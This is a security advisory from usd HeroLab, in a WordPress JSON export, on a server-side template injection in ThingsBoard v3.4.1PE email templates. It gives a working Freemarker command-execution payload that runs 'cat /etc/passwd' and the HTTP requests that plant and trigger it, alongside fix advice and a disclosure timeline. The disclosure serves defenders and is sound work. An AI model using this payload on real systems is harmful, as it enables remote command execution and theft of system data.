{"id":20831,"date":"2023-08-29T10:09:54","date_gmt":"2023-08-29T08:09:54","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2023-0010\/"},"modified":"2023-11-08T11:43:35","modified_gmt":"2023-11-08T10:43:35","slug":"usd-2023-0010","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0010\/","title":{"rendered":"usd-2023-0010"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2023-0010 | SSTI in ThingsBoard v.3.4.1PE<\/h1>\n<h1><\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2023-0010<br \/><strong>Product<\/strong>: ThingsBoard UI<br \/><strong>Affected Version<\/strong>: v.3.4.1PE<br \/><strong>Vulnerability Type<\/strong>: SSTI<br \/><strong>Security Risk<\/strong>: High (CVSS:3.0\/AV:N\/AC:L\/PR:H\/UI:R\/S:C\/C:H\/I:H\/A:H)<br \/><strong>Vendor URL<\/strong>: <a>https:\/\/thingsboard.io\/<\/a><br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE number<\/strong>: Pending<br \/><strong>CVE Link<\/strong>: Pending<br \/><strong>Last Update<\/strong>: 2023-08-29<\/p>\n<h3>Desciption<\/h3>\n<p>ThingsBoard is an open-source IoT platform for data collection, processing, visualization, and device management.<br \/>During an assessment a server-side template injection (SSTI) vulnerability was discovered.<br \/>Thingsboard uses templates in the automated generation of mail content.<br \/>The structure of the document is specified by a template into which the data is inserted dynamically.<br \/>Many template languages have additional features, such as performing calculations, processing logical operations directly in the template, or even executing operating system commands.<\/p>\n<p>If templates can be dynamically created and modified by attackers, this poses a high risk to the confidentiality and integrity of the application.<br \/>Thingsboards UI uses Apache Freemarker which is considered as turing-complete and allows executing commands on the system level.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>It was discovered that users with permissions to modify the email templates are able to execute arbitrary commands on the underlying system.<br \/>A user needs to modify the default templates and inject a template variable which executes a command. After sending the email the command is executed and the output is embedded into the mail.<\/p>\n<p>As shown at <a>https:\/\/portswigger.net\/research\/server-side-template-injection<\/a> an Apache Freemarker command execution is possible.<br \/>To execute <strong>whoami<\/strong> the following content must be inserted into the template: <strong>&lt;#assign ex=\"freemarker.template.utility.Execute\"?new()&gt; ${ex(\"whoami)}<\/strong>.<br \/>In the section <em>White Labeling<\/em> =&gt; <em>Mail Templates<\/em> the existing mail templates can be modified.<br \/>The following listing shows the request with the modified mail body.<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/api\/admin\/settings<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">thingsboard.local<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">[SESSION_COOKIE]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">34715<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Authorization<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Bearer [JWT]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">User-Agent<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/109.0.5414.75 Safari\/537.36<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">close<\/span>\n\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"createdTime\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"tenantId\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"entityType\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"TENANT\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"43ee4ed0-ccf0-11ea-8c84-731415dbf7ca\"<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">},<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"key\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"mailTemplates\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">  <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"jsonValue\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"test\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"subject\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"Test message from ThingsBoard\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">      <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"body\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"&lt;#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()&gt; ${ex(\\\"cat \/etc\/passwd\\\")}&lt;table class=\\\"main\\\" style=\\\"font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; box-sizing: border-box; border-radius: 3px; width: 100%; background-color: #f6f6f6; margin: 0px auto;\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" bgcolor=\\\"#f6f6f6\\\"&gt;\\n&lt;tbody&gt;\\n&lt;tr style=\\\"box-sizing: border-box; margin: 0px;\\\"&gt;\\n&lt;td class=\\\"content-wrap\\\" style=\\\"box-sizing: border-box; vertical-align: top; margin: 0px; padding: 20px;\\\" align=\\\"center\\\" valign=\\\"top\\\"&gt;\\n&lt;table style=\\\"box-sizing: border-box; border: solid 1px #e9e9e9; border-radius: 3px; margin: 0px; height: 127px; padding: 20px; background-color: #ffffff; width: 600px; max-width: 600px !important;\\\" width=\\\"600\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\"&gt;\\n&lt;tbody&gt;\\n&lt;tr style=\\\"box-sizing: border-box; margin: 0px;\\\"&gt;\\n&lt;td class=\\\"content-block\\\" style=\\\"color: #348eda; box-sizing: border-box; border-radius: 6px; vertical-align: top; margin: 0px; padding: 0px 0px 20px; width: 839px;\\\" valign=\\\"top\\\"&gt;\\n&lt;h2&gt;Test message from ThingsBoard&lt;\/h2&gt;\\n&lt;\/td&gt;\\n&lt;\/tr&gt;\\n&lt;tr style=\\\"box-sizing: border-box; margin: 0px;\\\"&gt;\\n&lt;td class=\\\"content-block\\\" style=\\\"box-sizing: border-box; vertical-align: top; margin: 0px; padding: 0px 0px 20px; width: 600px;\\\" valign=\\\"top\\\"&gt;\\n&lt;p&gt;&lt;span style=\\\"color: #000000;\\\"&gt;This email is indicating that your outgoing mail settings were set up correctly.&amp;nbsp;&lt;\/span&gt;&lt;\/p&gt;\\n&lt;p&gt;&amp;nbsp;&lt;\/p&gt;\\n&lt;\/td&gt;\\n&lt;\/tr&gt;\\n&lt;tr style=\\\"box-sizing: border-box; margin: 0px;\\\"&gt;\\n&lt;td class=\\\"content-block\\\" style=\\\"box-sizing: border-box; vertical-align: top; margin: 0px; padding: 0px 0px 20px; width: 600px;\\\" valign=\\\"top\\\"&gt;&lt;span style=\\\"color: #000000;\\\"&gt;&amp;mdash; The ThingsBoard&lt;\/span&gt;&lt;\/td&gt;\\n&lt;\/tr&gt;\\n&lt;\/tbody&gt;\\n&lt;\/table&gt;\\n&lt;\/td&gt;\\n&lt;\/tr&gt;\\n&lt;\/tbody&gt;\\n&lt;\/table&gt;\\n&lt;table style=\\\"color: #999999; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; box-sizing: border-box; margin: 0px auto; height: 64px; background-color: #f6f6f6; width: 100%;\\\" cellpadding=\\\"0px 0px 20px\\\"&gt;\\n&lt;tbody&gt;\\n&lt;tr style=\\\"box-sizing: border-box; margin: 0px;\\\"&gt;\\n&lt;td class=\\\"aligncenter content-block\\\" style=\\\"box-sizing: border-box; font-size: 12px; margin: 0px; padding: 0px 0px 20px; width: 600px; text-align: center; vertical-align: middle;\\\" align=\\\"center\\\" valign=\\\"top\\\"&gt;This email was sent to&amp;nbsp;&lt;a style=\\\"box-sizing: border-box; color: #999999; margin: 0px;\\\" href=\\\"mailto:${targetEmail}\\\"&gt;${targetEmail}&lt;\/a&gt;&amp;nbsp;by ThingsBoard.&lt;\/td&gt;\\n&lt;\/tr&gt;\\n&lt;\/tbody&gt;\\n&lt;\/table&gt;\"<\/span>\n<span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">},<\/span>\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">[<\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">...<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">]<\/span>\n<\/pre>\n<\/div>\n<p>After the template was modified and the template injection payload was inserted in the first line of the body, it is nececassary to trigger the mail content creation.<br \/>The modified template was used for test messages.<br \/>A test message can be sent by performing the following request.<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/api\/admin\/settings\/testMail<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">thingsboard.local<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">[SESSION_COOKIE]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">397<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Authorization<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Bearer [JWT]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">User-Agent<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/109.0.5414.75 Safari\/537.36<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">close<\/span>\n\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"createdTime\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"tenantId\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"key\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"mail\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"jsonValue\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"useSystemMailSettings\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">false<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"mailFrom\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"localhost\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"smtpProtocol\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"smtp\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"smtpHost\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"localhost\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"smtpPort\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"25\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"timeout\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"10000\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"enableTls\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">false<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"tlsVersion\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"enableProxy\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"proxyHost\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"proxyPort\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"proxyUser\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"proxyPassword\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"username\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}}<\/span>\n<\/pre>\n<\/div>\n<p>The mail address of the authenticated user receives a mail afterwards.<br \/>In the mail body the first line of the body contains the content of the <strong>\/etc\/passwd<\/strong> proofing that command execution is possible.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2023\/08\/ssti_passwd.png\" width=\"832\" height=\"464\" alt=\"\" class=\"wp-image-20826 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2023\/08\/ssti_passwd.png 832w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2023\/08\/ssti_passwd-480x268.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 832px, 100vw\" \/><\/p>\n<h3>Fix<\/h3>\n<p>It is recommended to define templates statically wherever possible.<br \/>If templates are generated dynamically based on user input, it must be ensured that attackers cannot inject any template commands or meta characters.<br \/>For this purpose, user input should be masked before it is inserted into the template.<br \/>It is also recommended to use templating engines that are not touring complete to separate the template engine and underlying system.<\/p>\n<h3>References<\/h3>\n<p><a>https:\/\/portswigger.net\/research\/server-side-template-injection<\/a><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2023-04-20<\/strong>: First contact request via contact form<\/li>\n<li><strong>2023-04-20<\/strong>: Fix was announced for upcoming 3.5 release<\/li>\n<li><strong>2023-05-11<\/strong>: ThingsBoard 3.5 was released<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Gerbert Roitburd of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2023-0010 | SSTI in ThingsBoard v.3.4.1PE Advisory ID: usd-2023-0010Product: ThingsBoard UIAffected Version: v.3.4.1PEVulnerability Type: SSTISecurity Risk: High (CVSS:3.0\/AV:N\/AC:L\/PR:H\/UI:R\/S:C\/C:H\/I:H\/A:H)Vendor URL: https:\/\/thingsboard.io\/Vendor Status: FixedCVE number: PendingCVE Link: PendingLast Update: 2023-08-29 Desciption ThingsBoard is an open-source IoT platform for data collection, processing, visualization, and device management.During an assessment a server-side template injection (SSTI) vulnerability was discovered.Thingsboard uses templates [&hellip;]<\/p>\n","protected":false},"author":115,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-20831","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/20831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/115"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=20831"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/20831\/revisions"}],"predecessor-version":[{"id":21305,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/20831\/revisions\/21305"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=20831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}